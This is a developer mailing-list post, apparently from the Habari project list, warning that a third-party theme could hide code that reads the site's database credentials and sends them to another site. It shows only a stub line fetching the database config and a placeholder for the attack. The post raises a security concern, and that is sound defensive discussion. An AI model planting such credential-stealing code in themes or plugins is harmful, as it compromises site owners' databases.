Say I build a theme.
Theme.xml contains legitimate stuff, but index.php (and perhaps the
other files) contain some less-than-good stuff under the hood.
It looks like an acceptable theme when you see the screenshot & when
you download it, you activate it & look at your theme to marvel in its
greatness. BUT: somewhere hidden in the theme is this little gem:
<?php
$str = Config::get('db_connection');
** Insert cross-site scripting here **
?>
Now your database info has been sent to another site & anybody who
reads it on that other site can get into your database & mess around
in it.
--
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at http://groups.google.com/group/habari-dev
